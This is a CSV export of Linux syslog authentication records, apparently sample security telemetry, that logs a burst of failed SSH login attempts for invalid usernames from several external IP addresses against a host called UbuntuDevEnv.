+17865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:20,UbuntuDevEnv,2019-06-26 09:27:20,auth,UbuntuDevEnv,info,Invalid user applmgr from 115.159.216.187 port 33525,70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,33525,,
+17866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:20,UbuntuDevEnv,2019-06-26 09:27:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+17867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:20,UbuntuDevEnv,2019-06-26 09:27:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:22,UbuntuDevEnv,2019-06-26 09:27:21,auth,UbuntuDevEnv,info,Invalid user lydia from 176.31.202.90 port 46902,70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.202.9,46902,,
+17869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:22,UbuntuDevEnv,2019-06-26 09:27:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:22,UbuntuDevEnv,2019-06-26 09:27:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:22,UbuntuDevEnv,2019-06-26 09:27:21,auth,UbuntuDevEnv,info,Failed password for invalid user applmgr from 115.159.216.187 port 33525 ssh2,70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,33525,,
+17872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:23,UbuntuDevEnv,2019-06-26 09:27:23,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 33525:11: Bye Bye [preauth],70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,33525,,
+17873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:23,UbuntuDevEnv,2019-06-26 09:27:23,auth,UbuntuDevEnv,info,Disconnected from invalid user applmgr 115.159.216.187 port 33525 [preauth],70711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,33525,,
+17874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:24,UbuntuDevEnv,2019-06-26 09:27:23,auth,UbuntuDevEnv,info,Failed password for invalid user lydia from 176.31.202.90 port 46902 ssh2,70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.202.9,46902,,
+17875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:24,UbuntuDevEnv,2019-06-26 09:27:24,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 46902:11: Bye Bye [preauth],70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,46902,,
+17876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:24,UbuntuDevEnv,2019-06-26 09:27:24,auth,UbuntuDevEnv,info,Disconnected from invalid user lydia 176.31.202.90 port 46902 [preauth],70842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lydia,176.31.202.9,46902,,
+17877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:25,UbuntuDevEnv,2019-06-26 09:27:24,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 32953 [preauth],70724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,32953,,
+17878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:46,UbuntuDevEnv,2019-06-26 09:27:45,auth,UbuntuDevEnv,info,Invalid user nathan from 176.31.43.255 port 53670,71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.43.2,53670,,
+17879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:46,UbuntuDevEnv,2019-06-26 09:27:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:46,UbuntuDevEnv,2019-06-26 09:27:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:48,UbuntuDevEnv,2019-06-26 09:27:47,auth,UbuntuDevEnv,info,Failed password for invalid user nathan from 176.31.43.255 port 53670 ssh2,71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.43.2,53670,,
+17882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:48,UbuntuDevEnv,2019-06-26 09:27:47,auth,UbuntuDevEnv,info,Disconnected from invalid user nathan 176.31.43.255 port 53670 [preauth],71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,176.31.43.2,53670,,
+17883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:48,UbuntuDevEnv,2019-06-26 09:27:47,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 53670:11: Bye Bye [preauth],71189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,53670,,
+17884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:11,UbuntuDevEnv,2019-06-26 09:28:11,auth,UbuntuDevEnv,info,Invalid user ym from 187.6.249.142 port 54428,71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ym,187.6.249.1,54428,,
+17885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:11,UbuntuDevEnv,2019-06-26 09:28:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:11,UbuntuDevEnv,2019-06-26 09:28:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:14,UbuntuDevEnv,2019-06-26 09:28:13,auth,UbuntuDevEnv,info,Failed password for invalid user ym from 187.6.249.142 port 54428 ssh2,71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ym,187.6.249.1,54428,,
+17888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:14,UbuntuDevEnv,2019-06-26 09:28:14,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 54428:11: Bye Bye [preauth],71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,54428,,
+17889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:14,UbuntuDevEnv,2019-06-26 09:28:14,auth,UbuntuDevEnv,info,Disconnected from invalid user ym 187.6.249.142 port 54428 [preauth],71286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ym,187.6.249.1,54428,,
+17890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:15,UbuntuDevEnv,2019-06-26 09:28:14,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 43049 [preauth],71287,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,43049,,
+17891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:24,UbuntuDevEnv,2019-06-26 09:28:24,auth,UbuntuDevEnv,info,Invalid user pedro from 165.22.203.187 port 58714,71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,165.22.203.1,58714,,
+17892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:24,UbuntuDevEnv,2019-06-26 09:28:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:24,UbuntuDevEnv,2019-06-26 09:28:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:27,UbuntuDevEnv,2019-06-26 09:28:26,auth,UbuntuDevEnv,info,Failed password for invalid user pedro from 165.22.203.187 port 58714 ssh2,71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,165.22.203.1,58714,,
+17895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:27,UbuntuDevEnv,2019-06-26 09:28:26,auth,UbuntuDevEnv,info,Disconnected from invalid user pedro 165.22.203.187 port 58714 [preauth],71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,165.22.203.1,58714,,
+17896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:27,UbuntuDevEnv,2019-06-26 09:28:26,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 58714:11: Bye Bye [preauth],71337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,58714,,
+17897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:50,UbuntuDevEnv,2019-06-26 09:28:49,auth,UbuntuDevEnv,info,Invalid user arc from 176.31.202.90 port 35474,71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.202.9,35474,,
+17898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:50,UbuntuDevEnv,2019-06-26 09:28:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:50,UbuntuDevEnv,2019-06-26 09:28:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:52,UbuntuDevEnv,2019-06-26 09:28:52,auth,UbuntuDevEnv,info,Failed password for invalid user arc from 176.31.202.90 port 35474 ssh2,71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.202.9,35474,,
+17901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:52,UbuntuDevEnv,2019-06-26 09:28:52,auth,UbuntuDevEnv,info,Disconnected from invalid user arc 176.31.202.90 port 35474 [preauth],71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arc,176.31.202.9,35474,,
+17902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:28:52,UbuntuDevEnv,2019-06-26 09:28:52,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 35474:11: Bye Bye [preauth],71428,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,35474,,
+17903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:00,UbuntuDevEnv,2019-06-26 09:29:00,auth,UbuntuDevEnv,info,Invalid user lorenzo from 118.24.90.122 port 52277,71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lorenzo,118.24.90.1,52277,,
+17904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:00,UbuntuDevEnv,2019-06-26 09:29:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:00,UbuntuDevEnv,2019-06-26 09:29:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:03,UbuntuDevEnv,2019-06-26 09:29:02,auth,UbuntuDevEnv,info,Failed password for invalid user lorenzo from 118.24.90.122 port 52277 ssh2,71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lorenzo,118.24.90.1,52277,,
+17907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:03,UbuntuDevEnv,2019-06-26 09:29:02,auth,UbuntuDevEnv,info,Disconnected from invalid user lorenzo 118.24.90.122 port 52277 [preauth],71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lorenzo,118.24.90.1,52277,,
+17908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:03,UbuntuDevEnv,2019-06-26 09:29:02,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 52277:11: Bye Bye [preauth],71457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,52277,,
+17909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:09,UbuntuDevEnv,2019-06-26 09:29:08,auth,UbuntuDevEnv,info,Invalid user whoopsie from 176.31.43.255 port 59362,71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.43.2,59362,,
+17910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:09,UbuntuDevEnv,2019-06-26 09:29:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:09,UbuntuDevEnv,2019-06-26 09:29:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:11,UbuntuDevEnv,2019-06-26 09:29:10,auth,UbuntuDevEnv,info,Failed password for invalid user whoopsie from 176.31.43.255 port 59362 ssh2,71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.43.2,59362,,
+17913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:11,UbuntuDevEnv,2019-06-26 09:29:10,auth,UbuntuDevEnv,info,Disconnected from invalid user whoopsie 176.31.43.255 port 59362 [preauth],71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.43.2,59362,,
+17914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:11,UbuntuDevEnv,2019-06-26 09:29:10,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 59362:11: Bye Bye [preauth],71498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,59362,,
+17915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:13,UbuntuDevEnv,2019-06-26 09:29:12,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 41658 [preauth],71487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,41658,,
+17916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:51,UbuntuDevEnv,2019-06-26 09:29:51,auth,UbuntuDevEnv,info,Invalid user nathan from 165.22.203.187 port 52386,71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,165.22.203.1,52386,,
+17917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:51,UbuntuDevEnv,2019-06-26 09:29:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:51,UbuntuDevEnv,2019-06-26 09:29:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:53,UbuntuDevEnv,2019-06-26 09:29:53,auth,UbuntuDevEnv,info,Failed password for invalid user nathan from 165.22.203.187 port 52386 ssh2,71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,165.22.203.1,52386,,
+17920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:53,UbuntuDevEnv,2019-06-26 09:29:53,auth,UbuntuDevEnv,info,Disconnected from invalid user nathan 165.22.203.187 port 52386 [preauth],71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nathan,165.22.203.1,52386,,
+17921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:53,UbuntuDevEnv,2019-06-26 09:29:53,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 52386:11: Bye Bye [preauth],71647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,52386,,
+17922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:54,UbuntuDevEnv,2019-06-26 09:29:53,auth,UbuntuDevEnv,info,Invalid user waski from 118.24.90.122 port 62283,71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,118.24.90.1,62283,,
+17923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:54,UbuntuDevEnv,2019-06-26 09:29:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:29:54,UbuntuDevEnv,2019-06-26 09:29:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,71646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
